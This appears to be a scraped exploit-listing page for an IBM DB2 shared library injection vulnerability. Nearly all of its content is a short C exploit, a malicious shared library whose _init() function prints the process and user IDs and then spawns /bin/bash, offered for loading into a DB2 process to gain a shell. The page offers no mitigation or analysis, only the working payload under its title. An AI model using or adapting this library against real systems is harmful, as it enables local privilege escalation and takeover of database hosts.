|
IBM DB2 Shared Library Injection Vulnerability
The following malicious shared library or exploit can be used: #include <stdio.h> #include <string.h> _init() { printf("en el _init()\n"); printf("Con PID=%i y EUID=%i",getpid(),getuid()); system("/bin/bash"); printf("Saliendo del Init()\n"); } |
|
|
Privacy Statement |